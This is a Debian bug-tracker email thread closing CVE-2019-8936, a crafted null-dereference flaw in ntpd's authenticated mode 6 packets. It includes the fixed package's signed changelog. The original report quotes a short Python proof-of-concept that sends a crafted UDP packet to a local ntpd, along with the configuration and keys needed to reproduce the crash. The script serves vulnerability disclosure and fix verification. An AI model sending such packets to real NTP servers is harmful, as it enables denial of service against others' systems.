Your message dated Thu, 21 Mar 2019 23:11:09 +0000
with message-id <[email protected]>
and subject line Bug#924228: fixed in ntp 1:4.2.8p13+dfsg-1
has caused the Debian Bug report #924228,
regarding ntp: CVE-2019-8936: Crafted null dereference attack in authenticated 
mode 6 packet
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
924228: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=924228
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Source: ntp
Version: 1:4.2.8p12+dfsg-3
Severity: important
Tags: security upstream
Forwarded: http://bugs.ntp.org/show_bug.cgi?id=3565

Hi,

The following vulnerability was published for ntp.

CVE-2019-8936[0]:
Crafted null dereference attack in authenticated mode 6 packet

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

To verify/illustrate the issue/fix one can use the following as
provided by the reporter in the upstream report:

        #!/usr/bin/env python
        import sys
        import socket

        buf = 
("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
               
"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
               "\x56\xc8\x07\xd4")

        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(buf, ('127.0.0.1', 123))

and running ntpd uder valgrind as

valgrind ntpd -n -c ~/resources/ntp.conf

with ntp.conf:

        logfile /tmp/ntp.log
        restrict 127.0.0.1
        keys /path/to/keys
        trustedkey 1
        controlkey 1
        requestkey 1

and keys

        1 M gurka
        2 M agurk


For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-8936
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936
[1] http://bugs.ntp.org/show_bug.cgi?id=3565
[2] 
http://bk.ntp.org/ntp-stable/ntpd/ntp_control.c?PAGE=diffs&REV=5c8106e7wWtXdh0lzg1ytlWribBTcQ

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore

--- End Message ---
--- Begin Message ---
Source: ntp
Source-Version: 1:4.2.8p13+dfsg-1

We believe that the bug you reported is fixed in the latest version of
ntp, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bernhard Schmidt <[email protected]> (supplier of updated ntp package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Thu, 21 Mar 2019 23:31:10 +0100
Source: ntp
Architecture: source
Version: 1:4.2.8p13+dfsg-1
Distribution: experimental
Urgency: medium
Maintainer: Debian NTP Team <[email protected]>
Changed-By: Bernhard Schmidt <[email protected]>
Closes: 764546 772790 924228
Changes:
 ntp (1:4.2.8p13+dfsg-1) experimental; urgency=medium
 .
    * New upstream version 4.2.8p13+dfsg
      - CVE-2019-8936: Crafted null dereference attack in authenticated
        mode 6 packet (Closes: #924228)
    * ntp: exit 0 from init script if daemon does not exist (Closes: #764546)
    * Drop locking from ntp initscript/systemd-wrapper
    * Only delete ntpd statistics files in cronjob (Closes: #772790)
Checksums-Sha1:
 ab2c8f0633ae928f541816c57c63a813b41628b1 2276 ntp_4.2.8p13+dfsg-1.dsc
 fd1fa6cae4d6decfa80eee90e62b257410a4f9e1 4451644 ntp_4.2.8p13+dfsg.orig.tar.xz
 c6270afcd16068b5361f9c7e30914965d2a6b47c 48356 
ntp_4.2.8p13+dfsg-1.debian.tar.xz
 9c788b307b32ce543bcb0fa985b1221d5c3e043c 7952 
ntp_4.2.8p13+dfsg-1_amd64.buildinfo
Checksums-Sha256:
 c88870f66bcea649417346635ce94b41c1d1ba7bc5dc25db01dcde30d9b4f909 2276 
ntp_4.2.8p13+dfsg-1.dsc
 fa010f03404a1667590ba613f3c83ee490442ab0ef1361d549675b00148e8f85 4451644 
ntp_4.2.8p13+dfsg.orig.tar.xz
 e0c692561a2665d317831cc317b64968384c910cd87b33b3d4e2197049ef6299 48356 
ntp_4.2.8p13+dfsg-1.debian.tar.xz
 561303ed422628b619909d6be09c86f1dfd6716c082e296dbf648a5e38bebdfb 7952 
ntp_4.2.8p13+dfsg-1_amd64.buildinfo
Files:
 c20b606e23924436bf6585c2c61f354e 2276 net optional ntp_4.2.8p13+dfsg-1.dsc
 6808bf32bc5418a70e80035203373529 4451644 net optional 
ntp_4.2.8p13+dfsg.orig.tar.xz
 7cd93e0b3b19601b383ad9facf0190dd 48356 net optional 
ntp_4.2.8p13+dfsg-1.debian.tar.xz
 cb3abe5d59b495f719d268c7b927a4d8 7952 net optional 
ntp_4.2.8p13+dfsg-1_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iQJFBAEBCgAvFiEE1uAexRal3873GVbTd1B55bhQvJMFAlyUEbURHGJlcm5pQGRl
Ymlhbi5vcmcACgkQd1B55bhQvJN0khAAo3O7fgAS8sdO8hmlkmPvN3G8dIEsx2bM
o7e2/yqtFG+NcAiz0SALu/JwRxcw3VnqssMZOOBv8ZbYzrdA88uO7U8JHgM2kWO8
8i56LhREgBxOMivT+82Jmbh9e+UJdgoyH9s1mKWviOk6yKV2VaH3Lry+12d6qvps
/vfybg8V0VgOlW3PBcVjRjE3kJV9SzlNpFoqP5m8HPmwMLdsN+QwJej6HKAMLYV5
SoynYOP4NYkaRUzsYvDYAxP/vRZUG2vA43VHG+sqDhSFCDAVg6L2/eHmnO6aJ3lX
8dY8Pvw2lce38NVvtvzgmZ9MI+kxOXfrJaWlCkyE1/odeSmiSffvs1TEeLqmJwZc
JKnuW08ag9o6TWZRQ/GBjsRcr8S54YX255z5axj974j1TsOny7/gLmlqPv/ZwAaE
PROYorFgrqK3cXlRR/tA9n7IPLGxCc0evAa4rNVme4SvZtNpAfk7vTvYpQoY803S
NCrm36P/DmcMyS5Uv1bweq3QnjOXGWwfL75XBlCinoyDNEKE8pcJwaajF8H6qE9J
1IS1KxgQZxqce+bZpuaGrMmS+gTf+LH1eWhI8AxQaI3okeZCNx5PPpLTE1UxiHse
oXkr+d9AEn5G6wJYxkcgh4liZ2Ho41gjDF28NkTR4OTwzcHp73KINRA2nDOshKBf
nY2Wuy4Kx+Y=
=bbxs
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to